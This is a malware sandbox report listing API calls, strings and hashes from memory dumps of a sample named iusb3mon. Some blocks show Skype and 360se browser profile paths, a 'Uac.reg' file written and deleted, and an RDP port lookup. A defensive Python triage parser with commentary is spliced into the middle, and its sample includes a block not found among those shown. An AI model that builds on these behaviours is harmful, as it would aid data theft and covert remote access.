                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog$FileFindFirst$CreateDecrementFolderInterlockedNextPathProcess32SleepSnapshotSpecialToolhelp32lstrlen
                                                                                                                    • String ID: C:\Users\$Skype.exe$\AppData\Roaming\Microsoft\Skype for Desktop
                                                                                                                    • API String ID: 12226711-3499480952
                                                                                                                    • Opcode ID: 7a385f5d273c61b57093e25813ef461ac88692877b6aff626a63919f5d8cc580
                                                                                                                    • Instruction ID: bf031e7c418c9b1b6b0163101e68d27ee8213797eb467ef4710b002e64d5e1d0
                                                                                                                    • Opcode Fuzzy Hash: 7a385f5d273c61b57093e25813ef461ac88692877b6aff626a63919f5d8cc580
                                                                                                                    • Instruction Fuzzy Hash: C6119071D60319EADBA5EBE0DD46FEEB7B8AF14300F114155BE21B21C0DBB85B488B61
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 0624495C
                                                                                                                      • Part of subcall function 06243441: __EH_prolog.LIBCMT ref: 06243446
                                                                                                                      • Part of subcall function 06243441: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0624345C
                                                                                                                      • Part of subcall function 06243441: Process32First.KERNEL32(00000000,?), ref: 06243475
                                                                                                                    • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000007,00000000), ref: 0624498A
                                                                                                                      • Part of subcall function 062587FB: lstrlenA.KERNEL32(?), ref: 0625883F
                                                                                                                      • Part of subcall function 06258633: __EH_prolog.LIBCMT ref: 06258638
                                                                                                                      • Part of subcall function 062585BF: __EH_prolog.LIBCMT ref: 062585C4
                                                                                                                      • Part of subcall function 062584B1: InterlockedDecrement.KERNEL32(-000000F4), ref: 062584C5
                                                                                                                    • Sleep.KERNEL32(000003E8,?,00000000,\AppData\Roaming\360se6\User Data\Default,?,C:\Users\,?), ref: 062449E6
                                                                                                                      • Part of subcall function 06242E2C: __EH_prolog.LIBCMT ref: 06242E31
                                                                                                                      • Part of subcall function 06242E2C: FindFirstFileA.KERNEL32(?,?), ref: 06242EBF
                                                                                                                      • Part of subcall function 06242E2C: FindNextFileA.KERNEL32(00000000,00000010,00000001,?,?,00000001), ref: 06242F7F
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog$FileFindFirst$CreateDecrementFolderInterlockedNextPathProcess32SleepSnapshotSpecialToolhelp32lstrlen
                                                                                                                    • String ID: 360se6.exe$C:\Users\$\AppData\Roaming\360se6\User Data\Default
                                                                                                                    • API String ID: 12226711-1244823433
                                                                                                                    • Opcode ID: 9cb01969ea717f59736d41824555ebda7f153aa765b0f1fae8090a02ee0bff00
                                                                                                                    • Instruction ID: 1cebcd8430e02ab91257faabd431e07a3df05ae1b01aae89b4fd8cb2cdc3e02f
                                                                                                                    • Opcode Fuzzy Hash: 9cb01969ea717f59736d41824555ebda7f153aa765b0f1fae8090a02ee0bff00
                                                                                                                    • Instruction Fuzzy Hash: 23118E71960319AADBA5EBE0DD46FEEBBB8AF14300F114155FE21B21C0DBB85B448A61
                                                                                                                    APIs
                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,000000E1), ref: 06243C3D
                                                                                                                    • CopyFileA.KERNEL32(?,?,00000000), ref: 06243C53
                                                                                                                      • Part of subcall function 06243BBA: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000), ref: 06243BD0
                                                                                                                      • Part of subcall function 06243BBA: WriteFile.KERNEL32(00000000,06265588,000000F5,?,00000000), ref: 06243BE8
                                                                                                                      • Part of subcall function 06243BBA: CloseHandle.KERNEL32(00000000), ref: 06243BF5
                                                                                                                    • Sleep.KERNEL32(?), ref: 06243C72
                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 06243C79
                                                                                                                    • DeleteFileA.KERNEL32(Uac.reg), ref: 06243C80
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: File$Sleep$CloseCopyCreateDeleteHandleModuleNameWrite
                                                                                                                    • String ID: Uac.reg
                                                                                                                    • API String ID: 3965208581-763348774
                                                                                                                    • Opcode ID: 307578baf7380074c0c89fe3631f1b0066d74dd1630b05ab1ad64526c7e2d37e
                                                                                                                    • Instruction ID: 36c1e22bae4c16c8cec32bac985916aae571f3b882a74bee708e70f3bcaa12fe
                                                                                                                    • Opcode Fuzzy Hash: 307578baf7380074c0c89fe3631f1b0066d74dd1630b05ab1ad64526c7e2d37e
                                                                                                                    • Instruction Fuzzy Hash: D0014F729003199BEB64ABA4EC49FCE7BBDEB04310F0041A2E789E6584DAB096848F51
                                                                                                                    APIs
                                                                                                                    • GetSysColor.USER32(0000000F), ref: 0625B5FA
                                                                                                                    • GetSysColor.USER32(00000010), ref: 0625B601
                                                                                                                    • GetSysColor.USER32(00000014), ref: 0625B608
                                                                                                                    • GetSysColor.USER32(00000012), ref: 0625B60F
                                                                                                                    • GetSysColor.USER32(00000006), ref: 0625B616
                                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 0625B623
                                                                                                                    • GetSysColorBrush.USER32(00000006), ref: 0625B62A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Color$Brush
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2798902688-0
                                                                                                                    • Opcode ID: ade09eef89f57afe1f859758a745e6b28d0922955f9854d364a11634928e1593
                                                                                                                    • Instruction ID: 8c51be8cbaf171913be0db746f33093499b8c70adbf7fc13bf23f9b6e988c95a
                                                                                                                    • Opcode Fuzzy Hash: ade09eef89f57afe1f859758a745e6b28d0922955f9854d364a11634928e1593
                                                                                                                    • Instruction Fuzzy Hash: 49F01C719407489BD730BF729D0AB47BAE1FFC4B10F020D2EE2858BA90E6B5A400DF40
                                                                                                                    APIs
                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001,?,00000000,001F87D3,?,?,bad locale name), ref: 001D56BD
                                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000,?,00000000,001F87D3,?,?,bad locale name), ref: 001D5728
                                                                                                                    • LCMapStringEx.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,001F87D3,?,?,bad locale name), ref: 001D5745
                                                                                                                    • LCMapStringEx.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000,001F87D3,?,?,bad locale name), ref: 001D5784
                                                                                                                    • LCMapStringEx.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,001F87D3,?,?,bad locale name), ref: 001D57E3
                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000,?,00000000,001F87D3,?,?,bad locale name), ref: 001D5806
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4571601291.00000000001D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002B0000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002B2000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002BA000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002C0000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002C6000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002C8000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002ED000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4575400315.000000000058A000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_1d0000_iusb3mon.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ByteCharMultiStringWide
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2829165498-0
                                                                                                                    APIs
                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 001D2E36
                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 001D2E58
                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 001D2E78
                                                                                                                    • std::_Facet_Register.LIBCPMT ref: 001D2EE5
                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 001D2F01
                                                                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 001D2F61
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4571601291.00000000001D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_1d0000_iusb3mon.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2081738530-0
                                                                                                                    APIs
                                                                                                                    • GetStringTypeW.KERNEL32(00000001,0625E7F0,00000001,?,7591E860,0627893C,?,?,00000002,00000000,?,?,06253769,?), ref: 06251D1E
                                                                                                                    • GetStringTypeA.KERNEL32(00000000,00000001,06276150,00000001,?,?,?,06253769,?), ref: 06251D38
                                                                                                                    • GetStringTypeA.KERNEL32(?,?,?,00000000,00000002,7591E860,0627893C,?,?,00000002,00000000,?,?,06253769,?), ref: 06251D6C
                                                                                                                    • MultiByteToWideChar.KERNEL32(?,0627893D,?,00000000,00000000,00000000,7591E860,0627893C,?,?,00000002,00000000,?,?,06253769,?), ref: 06251DA4
                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?), ref: 06251DFA
                                                                                                                    • GetStringTypeW.KERNEL32(?,?,00000000,?,?,?), ref: 06251E0C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: StringType$ByteCharMultiWide
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3852931651-0
                                                                                                                    APIs
                                                                                                                    • TlsGetValue.KERNEL32(00000000,06276588,00000000,?,00000000,?,0625C89F,06276588,00000000,?,00000100,0625C48E,0625C4D2,062587DA,00000100,06258773), ref: 0625C734
                                                                                                                    • EnterCriticalSection.KERNEL32(0000001C,00000010,?,00000000,?,0625C89F,06276588,00000000,?,00000100,0625C48E,0625C4D2,062587DA,00000100,06258773,?), ref: 0625C783
                                                                                                                    • LeaveCriticalSection.KERNEL32(0000001C,00000000,?,00000000,?,0625C89F,06276588,00000000,?,00000100,0625C48E,0625C4D2,062587DA,00000100,06258773,?), ref: 0625C796
                                                                                                                    • LocalAlloc.KERNEL32(00000000,?,?,00000000,?,0625C89F,06276588,00000000,?,00000100,0625C48E,0625C4D2,062587DA,00000100,06258773,?), ref: 0625C7AC
                                                                                                                    • LocalReAlloc.KERNEL32(?,?,00000002,?,00000000,?,0625C89F,06276588,00000000,?,00000100,0625C48E,0625C4D2,062587DA,00000100,06258773), ref: 0625C7BE
                                                                                                                    • TlsSetValue.KERNEL32(00000000,00000000,00000100), ref: 0625C7FA
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocCriticalLocalSectionValue$EnterLeave
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4117633390-0
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 06259ED7
                                                                                                                    • SendMessageA.USER32(?,0000001F,00000000,00000000), ref: 06259F24
                                                                                                                    • SendMessageA.USER32(?,0000001F,00000000,00000000), ref: 06259F46
                                                                                                                    • GetCapture.USER32 ref: 06259F58
                                                                                                                    • SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 06259F67
                                                                                                                    • WinHelpA.USER32(?,?,?,?), ref: 06259F7B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$CaptureH_prologHelp
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 432264411-0
                                                                                                                    APIs
                                                                                                                    • GetParent.USER32(?), ref: 0625C11D
                                                                                                                    • GetLastActivePopup.USER32(?), ref: 0625C12C
                                                                                                                    • IsWindowEnabled.USER32(?), ref: 0625C141
                                                                                                                    • EnableWindow.USER32(?,00000000), ref: 0625C154
                                                                                                                    • GetWindowLongA.USER32(?,000000F0), ref: 0625C166
                                                                                                                    • GetParent.USER32(?), ref: 0625C174
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                     • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 670545878-0
                                                                                                                    • Opcode ID: d4992e7267e96ba317a0bc3c32f1d16f497edc649032c7fffc003e72b3429d66
                                                                                                                    • Instruction ID: 090c54809c37e0e9456c005724a66d5991594a1f65922932afc2e000df9cc703
                                                                                                                    • Opcode Fuzzy Hash: d4992e7267e96ba317a0bc3c32f1d16f497edc649032c7fffc003e72b3429d66
                                                                                                                    • Instruction Fuzzy Hash: 1411A032B323235B97B16A695884B6BB2D89F56EE1F07812CED01D7204FB74C8008AE1
                                                                                                                    APIs
                                                                                                                    • VirtualFree.KERNEL32(0000000C,00100000,00004000,?,?,?,?,0624B691,0624B6E5,?,?,?), ref: 0624EDD9
                                                                                                                    • VirtualFree.KERNEL32(0000000C,00000000,00008000,?,?,?,?,0624B691,0624B6E5,?,?,?), ref: 0624EDE4
                                                                                                                    • HeapFree.KERNEL32(00000000,?,?,?,?,?,0624B691,0624B6E5,?,?,?), ref: 0624EDF1
                                                                                                                    • HeapFree.KERNEL32(00000000,?,?,?,?,0624B691,0624B6E5,?,?,?), ref: 0624EE0D
                                                                                                                    • VirtualFree.KERNEL32(?,00000000,00008000,?,?,0624B691,0624B6E5,?,?,?), ref: 0624EE2E
                                                                                                                    • HeapDestroy.KERNEL32(?,?,0624B691,0624B6E5,?,?,?), ref: 0624EE40
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                     • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Free$HeapVirtual$Destroy
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 716807051-0
                                                                                                                    • Opcode ID: c8b01bf627616d11b70ce41d78a4df74b9f3a43f4de2592d5ea282a5bae975e9
                                                                                                                    • Instruction ID: 56bd5c92d55a69d5d9d417e233e49cf6175b4d388bad68dc218c30abbfe17f31
                                                                                                                    • Opcode Fuzzy Hash: c8b01bf627616d11b70ce41d78a4df74b9f3a43f4de2592d5ea282a5bae975e9
                                                                                                                    • Instruction Fuzzy Hash: A7117C35660315AFEBB1AB10FC8DF15B3A6F740720F224434FBC162598C671A981CF05
                                                                                                                    APIs
                                                                                                                    • ClientToScreen.USER32(?,?), ref: 0625B875
                                                                                                                    • GetWindow.USER32(?,00000005), ref: 0625B886
                                                                                                                    • GetDlgCtrlID.USER32(00000000), ref: 0625B88F
                                                                                                                    • GetWindowLongA.USER32(00000000,000000F0), ref: 0625B89E
                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0625B8B0
                                                                                                                    • PtInRect.USER32(?,?,?), ref: 0625B8C0
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                     • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Rect$ClientCtrlLongScreen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1315500227-0
                                                                                                                    • Opcode ID: d8fa14d1c1c62a758498ae2dd57146cdc18b9f45e246614981b43cf6953bb99e
                                                                                                                    • Instruction ID: bd7ac8a526331c3504f8c4265891e80a332273030608f4395329625fc7598613
                                                                                                                    • Opcode Fuzzy Hash: d8fa14d1c1c62a758498ae2dd57146cdc18b9f45e246614981b43cf6953bb99e
                                                                                                                    • Instruction Fuzzy Hash: F301783251121ABBEB219E64AC0CEFE7769EF44352F024421FE51A60A4E63096168F91
                                                                                                                    APIs
                                                                                                                    • wsprintfA.USER32 ref: 0624758B
                                                                                                                      • Part of subcall function 062491B3: LoadLibraryA.KERNEL32(ADVAPI32.dll,?,?,?,?,?,?,00000000,00000000,00000000), ref: 06249216
                                                                                                                      • Part of subcall function 062491B3: GetProcAddress.KERNEL32(00000000,RegQueryValueExA), ref: 0624922E
                                                                                                                      • Part of subcall function 062491B3: GetProcAddress.KERNEL32(?,RegOpenKeyExA), ref: 0624923E
                                                                                                                      • Part of subcall function 062491B3: GetProcAddress.KERNEL32(?,RegEnumValueA), ref: 0624924E
                                                                                                                      • Part of subcall function 062491B3: GetProcAddress.KERNEL32(?,RegEnumKeyExA), ref: 0624925B
                                                                                                                      • Part of subcall function 062491B3: GetProcAddress.KERNEL32(?,RegCloseKey), ref: 06249268
                                                                                                                      • Part of subcall function 062491B3: FreeLibrary.KERNEL32(?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 062493F3
                                                                                                                    • lstrlenA.KERNEL32(00000080), ref: 062475B9
                                                                                                                    • lstrlenA.KERNEL32(00000080), ref: 062475C5
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                     • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc$Librarylstrlen$FreeLoadwsprintf
                                                                                                                    • String ID: 3389$PortNumber$SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\%s
                                                                                                                    • API String ID: 4274792114-3034822107
                                                                                                                    • Opcode ID: 1227f324cf2b3ce60831a853bfaf150da934671e44baa2eff38a78c350cfa0f0
                                                                                                                    • Instruction ID: 0f36967f936c174e3d9aa04b3cfd5a7654f466c1f3e337043b3eece833105be2
                                                                                                                    • Opcode Fuzzy Hash: 1227f324cf2b3ce60831a853bfaf150da934671e44baa2eff38a78c350cfa0f0
                                                                                                                    • Instruction Fuzzy Hash: D6F0AFB691122877CB706BA29C49FAF3F2DEF85658F010065BF08B6040D630E656CBF5
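The function above is the one worth pausing on in this run of listings: it resolves the ADVAPI32 registry exports by name at run time (LoadLibraryA plus five GetProcAddress calls, so nothing shows in the import table), formats `SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\%s` with wsprintfA and reads `PortNumber`, i.e. it discovers the RDP listener port (default 3389), which fits the remote-desktop feature set of the Zegost/Nitol family flagged in the detection summary. When a report contains hundreds of these blocks, an analyst does not read them one by one; the following Python is an added example (not part of the Joe Sandbox report or of the IDA plugin) that parses this text-export format, recovers the names each function resolves through GetProcAddress and the strings attached to it, and tags capabilities with a few heuristics of my own. The sample input is constructed from lines on this page; the rule set and its labels are assumptions, not Joe Sandbox signatures.

```python
import re
from dataclasses import dataclass, field

# One "Name.MODULE(args), ref: ADDR" entry; the parentheses are optional
# (e.g. "wsprintfA.USER32 ref: 0624758B" has none).
API_RE = re.compile(
    r"^(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)
SUBCALL_RE = re.compile(r"^Part of subcall function (?P<fn>[0-9A-Fa-f]+):\s*(?P<rest>.*)$")
SECTION_HEADERS = {"Memory Dump Source", "Joe Sandbox IDA Plugin", "Yara matches",
                   "Similarity", "Strings"}


@dataclass
class FunctionEntry:
    apis: list = field(default_factory=list)     # (api, module, args, ref, subcall_fn|None)
    strings: list = field(default_factory=list)  # split from the "String ID:" line
    opcode_id: str = ""


def parse_listing(text):
    """Split a Joe Sandbox function-listing export into per-function entries."""
    entries, cur, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line == "APIs":                       # every function block starts here
            cur, section = FunctionEntry(), "apis"
            entries.append(cur)
            continue
        if cur is None:
            continue
        if line in SECTION_HEADERS:
            section = line
            continue
        if not line.startswith("•"):
            continue
        body = line[1:].strip()
        if section == "apis":
            sub = None
            m = SUBCALL_RE.match(body)           # calls made by a callee are listed too
            if m:
                sub, body = m.group("fn"), m.group("rest")
            m = API_RE.match(body)
            if m:
                cur.apis.append((m.group("api"), m.group("module"),
                                 m.group("args") or "", m.group("ref"), sub))
        elif section == "Similarity":
            if body.startswith("String ID:"):
                cur.strings = [s for s in body[len("String ID:"):].strip().split("$") if s]
            elif body.startswith("Opcode ID:"):
                cur.opcode_id = body[len("Opcode ID:"):].strip()
    return entries


def resolved_names(entry):
    """Export names passed to GetProcAddress: imports hidden from the PE import table."""
    out = set()
    for api, _mod, args, _ref, _sub in entry.apis:
        if api == "GetProcAddress":
            parts = args.split(",")
            if len(parts) >= 2 and parts[1] not in ("?", "00000000"):
                out.add(parts[1])
    return out


def classify(entry):
    """Heuristic capability tags (my own rules, not sandbox signatures)."""
    names = {a[0] for a in entry.apis}
    resolved = resolved_names(entry)
    tags = []
    if {"RegOpenKeyExA", "RegQueryValueExA"} <= resolved and \
            any("WinStations" in s for s in entry.strings):
        tags.append("rdp-port-discovery: reads Terminal Server WinStations PortNumber")
    if resolved and {"LoadLibraryA", "GetProcAddress"} <= names:
        tags.append("dynamic-import-resolution: " + ",".join(sorted(resolved)))
    if {"GetSystemMetrics", "GetDeviceCaps", "GetDC"} <= names:
        tags.append("screen-geometry-query: screenshot / remote-desktop preparation")
    if {"HeapDestroy", "VirtualFree"} <= names:
        tags.append("crt-heap-teardown: runtime housekeeping, low interest")
    return tags


def triage(text):
    """Return [(opcode_id prefix, tags)] for every function with at least one tag."""
    return [(e.opcode_id[:12], classify(e)) for e in parse_listing(text) if classify(e)]


# Constructed sample: two function blocks copied from this report's listing.
SAMPLE = r"""
APIs
• wsprintfA.USER32 ref: 0624758B
  • Part of subcall function 062491B3: LoadLibraryA.KERNEL32(ADVAPI32.dll,?,?,?,?,?,?,00000000,00000000,00000000), ref: 06249216
  • Part of subcall function 062491B3: GetProcAddress.KERNEL32(00000000,RegQueryValueExA), ref: 0624922E
  • Part of subcall function 062491B3: GetProcAddress.KERNEL32(?,RegOpenKeyExA), ref: 0624923E
  • Part of subcall function 062491B3: GetProcAddress.KERNEL32(?,RegEnumValueA), ref: 0624924E
  • Part of subcall function 062491B3: GetProcAddress.KERNEL32(?,RegEnumKeyExA), ref: 0624925B
  • Part of subcall function 062491B3: GetProcAddress.KERNEL32(?,RegCloseKey), ref: 06249268
  • Part of subcall function 062491B3: FreeLibrary.KERNEL32(?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 062493F3
• lstrlenA.KERNEL32(00000080), ref: 062475B9
Strings
Memory Dump Source
• Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
Similarity
• API ID: AddressProc$Librarylstrlen$FreeLoadwsprintf
• String ID: 3389$PortNumber$SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\%s
• Opcode ID: 1227f324cf2b3ce60831a853bfaf150da934671e44baa2eff38a78c350cfa0f0
APIs
• GetSystemMetrics.USER32(0000000B), ref: 0625B63F
• GetDC.USER32(00000000), ref: 0625B65F
• GetDeviceCaps.GDI32(00000000,00000058), ref: 0625B670
• ReleaseDC.USER32(00000000,00000000), ref: 0625B680
Similarity
• String ID:
• Opcode ID: 34e378f819761107f16ab03cd1d30e7d776d093f838ba38160cb257266c0d9b8
"""

if __name__ == "__main__":
    for opcode, tags in triage(SAMPLE):
        print(opcode, *tags, sep="\n    ")
```

The parser keys on the structure the export actually has (an `APIs` line opens a block, the `Similarity` section carries the `String ID` and `Opcode ID` lines), so it is indifferent to the leading whitespace and the empty `Strings` headers the export leaves behind. The `Part of subcall function` prefix is kept as a separate field because the GetProcAddress calls here belong to the shared resolver at 062491B3, and a rule that wants to attribute the RDP lookup to the caller needs to know the names came via that helper.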
                                                                                                                    APIs
                                                                                                                    • FreeLibrary.KERNEL32(75070000), ref: 0624834A
                                                                                                                    • FreeLibrary.KERNEL32(6F060000), ref: 06248354
                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 0624835E
                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 06248368
                                                                                                                    • FreeLibrary.KERNEL32(762F0000), ref: 06248372
                                                                                                                    • FreeLibrary.KERNEL32(76A80000), ref: 0624837C
